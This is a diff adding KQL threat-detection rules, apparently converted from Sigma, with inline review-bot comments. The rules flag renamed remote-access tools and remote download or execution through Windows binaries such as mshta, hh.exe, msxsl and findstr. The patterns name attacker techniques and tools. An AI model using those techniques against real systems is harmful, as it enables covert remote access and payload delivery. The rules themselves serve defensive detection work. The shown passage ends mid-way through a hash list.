@@ -0,0 +1,12 @@ +// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: high +// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. +// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not(FolderPath endswith "\\meshagent.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql new file mode 100644 index 00000000..2d3a7a36 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql 
@@ -0,0 +1,10 @@ +// Title: Remote Access Tool - RURAT Execution From Unusual Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-19 +// Level: medium +// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql new file mode 100644 index 00000000..c61219c6 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql 
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - ScreenConnect Execution
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate usage of the tool
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "ScreenConnect Service" or ProcessVersionInfoProductName =~ "ScreenConnect" or ProcessVersionInfoCompanyName =~ "ScreenConnect Software"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql
new file mode 100644
index 00000000..5a3e8d1e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Installation Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-11
+// Level: medium
+// Description: Detects ScreenConnect program starts that establish a remote access to a system.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate use by administrative staff
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k="
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
new file mode 100644
index 00000000..8ba05d1c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
@@ -0,0 +1,12 @@ +// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale +// Date: 2022-02-25 +// Level: medium +// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed. + +DeviceProcessEvents +| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wevtutil.exe") and (InitiatingProcessCommandLine contains ":\\Windows\\TEMP\\ScreenConnect\\" and InitiatingProcessCommandLine contains "run.cmd") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql new file mode 100644 index 00000000..41bc9f2f --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql 
@@ -0,0 +1,12 @@ +// Title: Remote Access Tool - ScreenConnect Remote Command Execution +// Author: Ali Alwashali +// Date: 2023-10-10 +// Level: low +// Description: Detects the execution of a system command via the ScreenConnect RMM service. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. + +DeviceProcessEvents +| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql new file mode 100644 index 00000000..f2a05efe --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql @@ -0,0 +1,12 @@ +// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution +// Author: Jason Rathbun (Blackpoint Cyber) +// Date: 2024-02-26 +// Level: high +// Description: Detects potential web shell execution from the ScreenConnect server process. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql new file mode 100644 index 00000000..296cee81 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql 
@@ -0,0 +1,14 @@ +// Title: Remote Access Tool - Simple Help Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate usage of the tool + +DeviceProcessEvents +| where (FolderPath contains "\\JWrapper-Remote Access\\" or FolderPath contains "\\JWrapper-Remote Support\\") and FolderPath endswith "\\SimpleService.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql new file mode 100644 index 00000000..06bc159c --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql 
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server
+// Author: Ahmed Nosir (@egycondor)
+// Date: 2025-05-29
+// Level: medium
+// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.
+// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.
+// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219, attack.t1105
+// False Positives:
+// - Legitimate system administrator deploying TacticalRMM
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--api" and ProcessCommandLine contains "--auth" and ProcessCommandLine contains "--client-id" and ProcessCommandLine contains "--site-id" and ProcessCommandLine contains "--agent-type") and FolderPath contains "\\TacticalAgent\\tacticalrmm.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql
new file mode 100644
index 00000000..d3f23e31
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql
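Review bot: The `| where` line matches on the presence of `--api`, `--auth`, `--client-id`, `--site-id` and `--agent-type` but never reads the `--api` value, so despite the title it cannot distinguish an attacker-controlled server from the organisation's own and fires on every standard agent install (the False Positives line admits as much). Extract the server and compare it against the sanctioned RMM host(s), e.g. `| extend ApiUrl = extract(@"--api\s+(\S+)", 1, ProcessCommandLine)` followed by `| where not(ApiUrl has_any ("rmm.corp.example"))`, with the allowlist maintained per tenant. Separately, `FolderPath contains "\\TacticalAgent\\tacticalrmm.exe"` would be tighter as `endswith`, matching how the neighbouring rules anchor the image path.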
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Team Viewer Session Started On Windows Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql
new file mode 100644
index 00000000..cc5c040e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql
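Review bot: The `FolderPath =~ "TeamViewer_Desktop.exe"` and `InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"` clauses in the `| where` line are exact equality against image columns that every other rule in this batch anchors with `endswith "\\…"`, so if those columns carry the full path as the sibling rules assume, this query can never match and the rule is silently dead. The intent is plainly a file-name match; change the two clauses to `FolderPath endswith "\\TeamViewer_Desktop.exe" and InitiatingProcessFolderPath endswith "\\TeamViewer_Service.exe"`. It is worth checking whether the converter turned an upstream suffix match into `=~` elsewhere in the generated set, since the ProcessCommandLine clause on the same line did come through as `endswith`.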
@@ -0,0 +1,14 @@ +// Title: Remote Access Tool - UltraViewer Execution +// Author: frack113 +// Date: 2022-09-25 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoProductName =~ "UltraViewer" or ProcessVersionInfoCompanyName =~ "DucFabulous Co,ltd" or ProcessVersionInfoOriginalFileName =~ "UltraViewer_Desktop.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql new file mode 100644 index 00000000..4c8c2c45 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Remote CHM File Download/Execution Via HH.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-29 +// Level: high +// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "\\\\") and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql new file mode 100644 index 00000000..6053c9df --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql @@ -0,0 +1,10 @@ +// Title: Remote Code Execute via Winrm.vbs +// Author: Julia Fomina, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql new file mode 100644 index 00000000..3a5ebb05 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql 
@@ -0,0 +1,10 @@ +// Title: Remote File Download Via Desktopimgdownldr Utility +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ProcessCommandLine contains "/lockscreenurl:http" and FolderPath endswith "\\desktopimgdownldr.exe" and InitiatingProcessFolderPath endswith "\\desktopimgdownldr.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql b/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql new file mode 100644 index 00000000..4f2df68f --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Remote File Download Via Findstr.EXE +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: medium +// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v " or ProcessCommandLine contains " –v " or ProcessCommandLine contains " —v " or ProcessCommandLine contains " ―v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l " or ProcessCommandLine contains " –l " or ProcessCommandLine contains " —l " or ProcessCommandLine contains " ―l ") and ProcessCommandLine contains "\\\\") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql new file mode 100644 index 00000000..bf8492a6 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql 
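Review bot: `FolderPath endswith "findstr.exe"` in the `| where` line is the only image clause in this batch without a leading `\\`, so it also matches any executable whose name merely ends in `findstr.exe`; use `FolderPath endswith "\\findstr.exe"` for parity with the `ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"` alternative beside it. Note too that the first alternative, `ProcessCommandLine contains "findstr"`, lets a command line that only mentions findstr (a `cmd /c … | findstr` pipeline, for instance) satisfy the image part, leaving the `-v`/`-l` flag and `\\` UNC checks to carry the whole signal. If that breadth is intended it deserves a line under a False Positives header, which this rule omits unlike its neighbours.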
@@ -0,0 +1,12 @@ +// Title: Remote PowerShell Session Host Process (WinRM) +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-09-12 +// Level: medium +// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006 +// False Positives: +// - Legitimate usage of remote Powershell, e.g. for monitoring purposes. + +DeviceProcessEvents +| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql new file mode 100644 index 00000000..87d6e351 --- /dev/null +++ b/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql @@ -0,0 +1,12 @@ +// Title: Remote XSL Execution Via Msxsl.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: high +// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - Msxsl is not installed by default and is deprecated, so unlikely on most systems. + +DeviceProcessEvents +| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql new file mode 100644 index 00000000..98fe8929 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql @@ -0,0 +1,10 @@ +// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses +// Author: frack113 +// Date: 2021-07-13 +// Level: high +// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql new file mode 100644 index 00000000..9537c7d5 --- /dev/null +++ b/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql @@ -0,0 +1,10 @@ +// Title: Remotely Hosted HTA File Executed Via Mshta.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-08 +// Level: high +// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql new file mode 100644 index 00000000..be62ef8f --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed AutoHotkey.EXE Execution +// Author: Nasreddine Bencherchali +// Date: 2023-02-07 +// Level: medium +// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql b/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql new file mode 100644 index 00000000..0901b0db --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql 
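Review bot: The exclusion `FolderPath contains "\\AutoHotkey"` at the end of the `| where` line makes the preceding eleven `endswith` clauses redundant and, more importantly, suppresses the alert for any path containing a directory that starts with `\AutoHotkey`, so a renamed binary dropped at e.g. `C:\Users\Public\AutoHotkeyTmp\svc.exe` is never reported even though catching a renamed binary is the rule's whole purpose. If the aim is to allow any `AutoHotkey*.exe` build, anchor on the file name rather than the whole path: `not(FileName startswith "AutoHotkey")` (FileName is the image-name column alongside FolderPath in DeviceProcessEvents; confirm it is populated in your tenant). Either way, remove the path-wide `contains` so the explicit name list is the single source of truth.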
@@ -0,0 +1,10 @@ +// Title: Renamed BOINC Client Execution +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the execution of a renamed BOINC binary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "BOINC.exe" and (not(FolderPath endswith "\\BOINC.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql new file mode 100644 index 00000000..1f2cc434 --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed BrowserCore.EXE Execution +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-06-02 +// Level: high +// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "BrowserCore.exe" and (not(FolderPath endswith "\\BrowserCore.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql new file mode 100644 index 00000000..b5eaa2ca --- /dev/null +++ b/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Renamed Cloudflared.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-20 +// Level: high +// Description: Detects the execution of a renamed "cloudflared" binary. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")) or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith 
"44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith 
